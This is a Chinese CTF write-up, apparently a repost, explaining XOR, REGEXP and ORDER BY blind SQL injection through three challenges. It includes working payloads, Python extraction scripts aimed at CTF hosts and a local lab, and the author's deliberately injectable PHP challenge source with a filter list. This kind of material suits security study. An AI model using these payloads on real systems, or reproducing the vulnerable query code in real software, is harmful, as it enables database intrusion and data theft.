从CTF题中学习几种有趣(奇怪)的SQL注入

栏目: 数据库 · 发布时间: 5年前

内容简介:最近在尝试总结一些SQL注入相关的知识,看了很多师傅们整理的文章,受益匪浅。决定根据他们的思路去尝试复现一些CTF题来学习,自己也尝试出了一个SQL注入题来加深印象。总的来说还是学到很多东西的。第一次投稿文章,里面的内容有些乱。有问题还希望师傅们提出来,谢谢。题目地址:

说在前面

最近在尝试总结一些 SQL 注入相关的知识,看了很多师傅们整理的文章,受益匪浅。决定根据他们的思路去尝试复现一些CTF题来学习,自己也尝试出了一个SQL注入题来加深印象。总的来说还是学到很多东西的。

第一次投稿文章,里面的内容有些乱。有问题还希望师傅们提出来,谢谢。

1.异或注入

题目地址: http://119.23.73.3:5004/

在一个师傅的博客中看到这题的Writeup,尝试按照他的payload进行复现,怎么都复现不出来。后来在安全客上看到另一篇异或注入的文章,才把这个题解决了。

初步测试之后会发现,题目过滤了 空格,+,*,or,substr ...等一些字符。而且#号注释也不起作用。

于是尝试异或注入。

http://119.23.73.3:5004/?id=1'^'1   返回错误
http://119.23.73.3:5004/?id=1'^'0   返回正常

MYSQL 中:

从CTF题中学习几种有趣(奇怪)的SQL注入

可见,当/?id=1'^'1时,传递到数据库当中,是id=0,由于为0的id不存在,所以这里返回错误。第二个同理。

这里属于布尔盲注,于是构造payload,用脚本跑:

检索数据库:

id=2'^!(SELECT(ASCII(MID((SELECT(GROUP_CONCAT(schema_name))FROM(information_schema.schemata)),1,1))=104))^'1'='1

检索出来的库为:information_schema,moctf,mysql,performance_schema

检索表:

id=2'^!(SELECT(ASCII(MID((SELECT(GROUP_CONCAT(table_name))FROM(information_schema.tables)WHERE(table_schema='moctf')),1,1))=104))^'1'='1

检索出来的表:do_y0u_l1ke_long_t4ble_name,news

检索字段:

id=2'^!(SELECT(ASCII(MID((SELECT(GROUP_CONCAT(column_name))FROM(information_schema.columns)WHERE(table_name='do_y0u_l1ke_long_t4ble_name')),1,1))=104))^'1'='1

检索出来的字段:d0_you_als0_l1ke_very_long_column_name

读Flag:

id=2'^!(SELECT(ASCII(MID((SELECT(GROUP_CONCAT(d0_you_als0_l1ke_very_long_column_name))FROM(moctf.do_y0u_l1ke_long_t4ble_name)),1,1))=104))^'1'='1

moctfb1ind_SQL_1njecti0n_g0od

脚本:

import requests

#文字转ascii ord()
#ascii转文字 ascii()

dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,"
url = "http://119.23.73.3:5004/?id=2'^"
keyword = "Tip"
string = ""

for i in range(1, 300):
    for j in dic:
        payload = "!(SELECT(ASCII(MID((SELECT(GROUP_CONCAT(schema_name))FROM(information_schema.schemata)),{0},1))={1}))^'1'='1".format(str(i),ord(j))
        url_get = url + payload
        print(url_get)
        content = requests.get(url_get)
        if keyword in content.text:
            string += j
            print(string)
            break
print("result = " + string)

跑出来的Flag:

从CTF题中学习几种有趣(奇怪)的SQL注入

2.REGEXP盲注

题目链接: http://ctf5.shiyanbar.com/web/earnest/index.php

Writeup(要登录): http://www.shiyanbar.com/ctf/writeup/4828

这道题我本来是信心满满的,然后越做越不对劲。做这道题的时候并没有fuzz的字段还没有逗号,莫名就会被拦截,搞得一头雾水。最后还是跑去看Writeup了。

先fuzz单字符来看看waf。还是拦截了很多的,而且逗号和空格也被过滤了。

从CTF题中学习几种有趣(奇怪)的SQL注入

除此之外,被过滤的还有:is not, union, sleep, substr, benchmark, substring, and。 并且根据大佬的思路,这里的 or,+,* 也都会被替换为空

看来时间盲注是没戏了。并且过滤了逗号。

我们知道,regexp盲注的原理是用正则表达式匹配。

例子:

正常的语句为:select username from users where id = 1
正常返回:admin

构造语句:
select (select username from users where id = 1) regexp '^a' 返回真(1)
select (select username from users where id = 1) regexp '^b' 返回假(0)

因为这里'^a'是匹配以a开头的字符串,原来正常返回的就是admin,所以会返回真。

继续就可以使用 regexp '^ad'...读出想要的数据

那么这里该怎么构造呢?

  • 获取version

先用length来判断verison的长度:

id=11'Or(LENGTH(version())=6)Or'1'='

由于^被过滤了,所以用$来从尾部开始读。

脚本:

import requests

key = "You are in"
words = ""
data = {"id": ""}
word = '0123456789.'

for i in range(10):
    for j in word:
        data['id'] = "11'Or(SELECT(version()regexp'{}$'))Or'1'='".format(j+words)
        print(data)
        content = requests.post("http://ctf5.shiyanbar.com/web/earnest/index.php", data = data)
        if key in content.text:
            words = str(j) + words
            print(words)

最后跑出来为:“5.6..4”

  • 获取数据库名

将上面的word替换为:"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,", version()替换为database()即可。

跑出来为:Ctf_sql_bOol_bLInd

  • 获取表

注意这里的seperator里面的or要双写。

import requests

key = "You are in"
words = ""
data = {"id": ""}
word = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_{}@~."

for i in range(30):
    for j in word:
        data['id'] = "11'Or(SELECT((SELECT(group_concat(table_name\nseparatoorr\n'@'))FROM(INFORMATION_SCHEMA.tables)WHERE(TABLE_SCHEMA=database()))regexp'{}$'))Or'1'='".format(j+words)
        print(data)
        content = requests.post("http://ctf5.shiyanbar.com/web/earnest/index.php", data = data)
        #print(content.text)
        if key in content.text:
            words = str(j) + words
            print(words)

跑出来的表:fIAg@useRs

可能是脚本的原因,我跑出来的表是有大写有小写。

并且这里有个坑就是逗号被过滤了,导致group_concat必须使用separator指定字符来分割。

  • 获取字段
import requests

key = "You are in"
words = ""
data = {"id": ""}
word = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_{}@~."

for i in range(30):
    for j in word:
        data['id'] = "11'Or(SELECT((SELECT(group_concat(column_name\nseparatoorr\n'@'))FROM(INFORMATION_SCHEMA.columns)WHERE(table_name='fiag'))regexp'{}$'))Or'1'='".format(j+words)
        print(data)
        content = requests.post("http://ctf5.shiyanbar.com/web/earnest/index.php", data = data)
        #print(content.text)
        if key in content.text:
            if j == "$":
                words = j+ words
            else:
                words = j+ words
            print(words)

这里的坑实在是太奇怪了,当word里面不加点号时,跑出来只有:4g,原因是字段的名字为fl$4g,里面包含一个$导致正则匹配错误。

Writeup原作者,将点号加到了word里。跑出来就为:fl..g,可以猜测到字段名为:fl$4g (真的是猜测)

在正则当中,点号是用来匹配任意字符的,这里的$就会被.替代。这里我真的被卡了好久。

  • 获取flag
import requests

key = "You are in"
words = ""
data = {"id": ""}
word = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_{}@~."

for i in range(30):
    for j in word:
        data['id'] = "11'Or(SELECT(SELECT(fl$4g)FROM(fiag))regexp'{}$')Or'1'='".format(str(j)+words)
        print(data)
        content = requests.post("http://ctf5.shiyanbar.com/web/earnest/index.php", data = data)
        #print(content.text)
        if key in content.text:
            words = str(j) + words
            print(words)

最后跑出来的结果为:

Fla.{HAh.~YOu.WIn.}

像跑字段一样尝试之后可以猜测到:

最后的flag为:

flag{haha~you win!}
  • 总结

这道题其实可以使用mid来做,会更简单,不会再像这个.号一样需要自己去猜。但还是会很多的坑。

mid方式参考: https://www.cnblogs.com/Ragd0ll/p/8684767.html

这题这样做的意义更多的是学习regexp盲注吧。

3.ORDER BY 注入

先来看一下ORDER BY注入的原理

SELECT username, password FROM users order by 1 asc;

这是一个常见的order by使用语句,后面的数字是列号(也可以指定列名),asc & desc指定是升序还是降序。

注意:在order by后面的不会根据计算的结果来排序。

这里有以下几种方式来进行测试:

直接加报错注入的payload:

直接在order by后面加语句:order by (SELECT extractvalue(1,concat(0x7e,(select @@version),0x7e))) 进行报错注入

rand()方式

rand()会返回一个0和1之间的随机数,如果参数被赋值,同一个参数会返回同一个数。
这里就可以用布尔盲注的方式来进行注入
order by rand(mid(version(),1,1)=5)
当然这里也可以用时间盲注的方式。

and payload时间盲注方式

在order by后面的不会根据计算的结果来排序,但是当我们的payload有延迟命令的时候,页面还是会延迟的。

使用and连接时间延迟payload:

order by 1 and (If(substr(version(),1,1)=5,0,sleep(5)))

这里用sqllib作为一个学习的例子:

它的源代码为:

$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";

报错注入的payload:

php 版本:

http://127.0.0.1/sqli/Less-46/index.php?sort=(SELECT extractvalue(1,concat(0x7e,(select @@version),0x7e)))--+

读表:

http://127.0.0.1/sqli/Less-46/index.php?sort=(SELECT extractvalue(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security'),0x7e)))--+

读字段:

http://127.0.0.1/sqli/Less-46/index.php?sort=(SELECT extractvalue(1,concat(0x7e,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'users'),0x7e)))--+

读内容:

http://127.0.0.1/sqli/Less-46/index.php?sort=(SELECT extractvalue(1,concat(0x7e,(SELECT group_concat(username) FROM users),0x7e)))--+

rand()方式和and时间盲注的payload基本差不多,这里就不再重复了。

另一种order by注入

我自己写了一个题来学习这一种order by注入。题目过滤了F1g3这个字段名。在id=3时,F1g3字段存在flag的base16编码。(直接过滤Flag会更好)

查询语句:

$sql = "SELECT id, F1ag, username FROM this_1s_th3_fiag_tab13 WHERE id = ".$id.";";

已知:数据库名:user,表名:this_1s_th3_fiag_tab13,字段名:F1g3,列号为2

因为过滤了F1g3这个字段名,我们不能直接用普通盲注的方式得到Flag,所以就得使用一种特别的order by盲注。

访问:
index.php?id=3 union select 1,2,3 order by 1
返回:
id: 1 name: 3 
id: 3 name: threezh1

可以看到这里的1,3分别对应了id和name。 并使用了order by指定id排序。

当我们将字段1修改为4时,也就是访问:

index.php?id=3 union select 4,2,3 order by 1

就会返回:

id: 3 name: threezh1 
id: 4 name: 3

这是因为,在 排序 的时候,order by是默认升序排列。select 4,2,3时就会排到后面。

根据这个差异,我们可以指定按第二列来排序,并在select里猜测flag的值。这样就可以不使用F1g3这个字段名就把值读出来。

访问:/index.php?id=3 union select 1,'6',3 order by 2
返回:
id: 1 name: 3 
id: 3 name: threezh1 

访问:/index.php?id=3 union select 1,'7',3 order by 2
返回:
id: 3 name: threezh1 
id: 1 name: 3

出现差别了,因为这里是大于才会出现排序不一样,所以flag的第一个字符为6。

按照这个思路,写出脚本:

import requests
key = "<tr><td> id: 3 </td> <td> name: threezh1 </td> <br/></tr><tr><td> id: 3 </td> <td> name: 3 </td> <br/></tr>"
words = ""
data = "id=3 union select 3,'{0}',3 order by 2"
dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


for i in range(100):
    for j in dic:
        payload = data.format(words + j)
        print(payload)
        content = requests.get("http://127.0.0.1/index.php?" + payload)
        if key in content.text:
            words = words + temp
            print(words)
            break
        temp = j

最后可以直接得到flag的base16编码。

从CTF题中学习几种有趣(奇怪)的SQL注入

这里有个问题就是,当select 1,2,3 中字段位的数据与数据库里的数据相等时,匹配的时候如果是匹配的是7就是7不用再退一位。

最后跑出来是 666c61677b643067335f74687265657a68317c

那么真实的flag的base16编码为:666c61677b643067335f74687265657a68317d

解码即可

题目源码:

<?php
$dbhost = 'localhost';  // mysql服务器主机地址
$dbuser = 'root';            // mysql用户名
$dbpass = 'root';          // mysql用户名密码
$conn = mysqli_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{
    die('Could not connect: ' . mysqli_error());
}
mysqli_select_db($conn, 'user');
$id = $_GET['id'];
if (!isset($id)){
    echo "Please tell me the id , And you should think what is the sort way.";
    exit();
}
//echo strtolower($id)."<br/>";
if (preg_match('/(char|hex|conv|lower|lpad|into|password|md5|encode|decode|convert|cast)/i',strtolower($id)) != 0){ //|\s
    echo "NoNoNo";
    exit();
}

if (stripos($id, "F1ag")){
    echo "Close, but No!!! Thinking...";
    exit();
}
$sql = "SELECT id, F1ag, username FROM this_1s_th3_fiag_tab13 WHERE id = ".$id.";";
$retval = mysqli_query($conn, $sql);
if(!$retval)
{
    die('???');// . mysqli_error($conn)
}
while($row = mysqli_fetch_array($retval, MYSQLI_ASSOC))
{
    echo "<tr><td> id: {$row['id']} </td> ".
         "<td> name: {$row['username']} </td> <br/>".
         "</tr>";
}
mysqli_close($conn);
?>

sql:

SET NAMES utf8mb4;
SET FOREIGN_KEY_CHECKS = 0;

-- ----------------------------
-- Table structure for this_1s_th3_fiag_tab13
-- ----------------------------
DROP TABLE IF EXISTS `this_1s_th3_fiag_tab13`;
CREATE TABLE `this_1s_th3_fiag_tab13`  (
  `id` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL,
  `F1ag` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL,
  `username` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL,
  `password` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL
) ENGINE = MyISAM CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic;

-- ----------------------------
-- Records of this_1s_th3_fiag_tab13
-- ----------------------------
INSERT INTO `this_1s_th3_fiag_tab13` VALUES ('3', '666C61677B643067335F74687265657A68317D', 'threezh1', 'You is pig');
INSERT INTO `this_1s_th3_fiag_tab13` VALUES ('1', 'No the Flag', 'oops,This is not the flag id', 'You is pig');
INSERT INTO `this_1s_th3_fiag_tab13` VALUES ('2', 'No the Flag', 'Not the flag also', 'You is pig');

SET FOREIGN_KEY_CHECKS = 1;

参考


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

同伦方法纵横谈

同伦方法纵横谈

王则柯 / 大连理工大学 / 2011-5 / 25.00元

《走向数学丛书07-同伦方法纵横谈》,在本书里读者会看到许多人物故事,作为一本普及读物,我们有时候甚至觉得,对于不少读者来说,书中所写的科学研究中的人物故事,可能比书中介绍的具体的研究成果更有价值,这些人物故事,许多都出自我们个人之间的交往,这是从一个侧面了解科学研究的规律,了解科学家之成为科学家的珍贵记录。一起来看看 《同伦方法纵横谈》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码